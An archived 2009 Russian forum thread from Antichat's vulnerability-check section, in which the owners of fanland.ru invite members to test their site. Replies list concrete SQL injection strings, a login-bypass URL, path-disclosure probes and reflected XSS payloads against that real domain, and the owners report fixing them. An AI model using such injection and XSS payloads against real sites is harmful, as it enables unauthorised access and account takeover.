Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   Fanland.ru (https://forum.antichat.xyz/showthread.php?t=105264)

ВолкS 18.01.2009 17:06
fanland.ru
 
Проверьте, пожалуйста, на уязвимости различные http://fanland.ru

BlackSun 18.01.2009 18:25
Раскрытие путей
http://fanland.ru/news.php?usr='&pwd='%20--%20
http://fanland.ru/forum.php?usr=user&pwd=pwd&razd=3&tema=-1'&id=look_t
http://fanland.ru/forum.php?usr=user&pwd=pwd&razd=-1'&user=BlackKogep&tema=46&id=create_p
http://fanland.ru/?usr=valid user&pwd=valid pass (bzz, wtf 0_o)
В поиске тоже самое

SQL-INJ
http://fanland.ru/news.php?usr='+or+1%3d'1&pwd='%20--%20

XSS
http://fanland.ru/news.php?usr='+or+1%3d'1'%20--%20'>"><script>alert()</script><noscript>&pwd='%20--%20

sql-inj в действии
http://fanland.ru/msg.php?usr=West'%20--%20&pwd=b46641af0203c864a8f5c44f2ab9c250&id=read

------------------------
Дальше копать не буду, там этого добра еще навалом. На доработку, потом заходите снова

kolpeex 19.01.2009 13:04
снова раскрытие путей
http://fanland.ru/info_m.php?usr[]=LegionDEAD&pwd=[скрыто]&man=LegionDEAD
Цитата:
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /[path]/fanland.ru/info_m.php on line 15
http://fanland.ru/forum.php?usr=kolpeex&pwd=[скрыто]&razd=[здесь]&user=DAMBOLDOR&tema=[и здесь]&id=create_p

С темой WEB и кавычкой в пароле сайт уходит в бесконечную рекурсию, загрязняя мой кэш.

ВолкS 19.01.2009 13:19
Спасибо всем отписавшимся. Ща на другой сервер будем переезжать, заодно на день-два закроем на устранение уязвимостей. Еще раз спасибо!

ronald 19.01.2009 16:44
может и бесполезно, но вот: http://fanland.ru/info_1.php на момент отписывания поста выскакивает ошибка при переходе туды

LiraS 08.02.2009 14:06
Fanland.ru
 
В прошлый раз создавал сдесь тему мой хороший друг, тогда много ошибок нашли попросили доработать, я конечно вроде все вами сказанные ошибки исправил, но все же просьба еще раз проверить скрипт, так как я мог допустить также много ошибок, так как сам я самоучка, нигде не учился...Кстате вот адресок: http://fanland.ru

Maestus 08.02.2009 21:15
Пассивный XSS
http://fanland.ru/info_m.php?usr=[any username]&pwd=[any password]&man=617"><script>alert(33)</script>
http://fanland.ru/anketa.php?usr=[any username]&pwd=[any pass]&man=618"><script>alert(23)</script>

LiraS 08.02.2009 23:18
Спасибо, исправил ошибки, если есть еще, то пишите буду благодарен

Maestus 09.02.2009 00:46
SQL инъекция
1./chat.php
1.1 http://fanland.ru/chat.php?pwd=password&usr=username'
1.2 http://fanland.ru/chat.php?usr=username&pwd=password'
2./smile.php
2.1 http://fanland.ru/smile.php?pwd=password&id=&usr=username'+and+'a'=' a
2.2 http://fanland.ru/smile.php?usr=username&id=&pwd=password'

LiraS 09.02.2009 21:08
Спасибо, исправил, если найдете еще, то буду благодарен.


Время: 14:25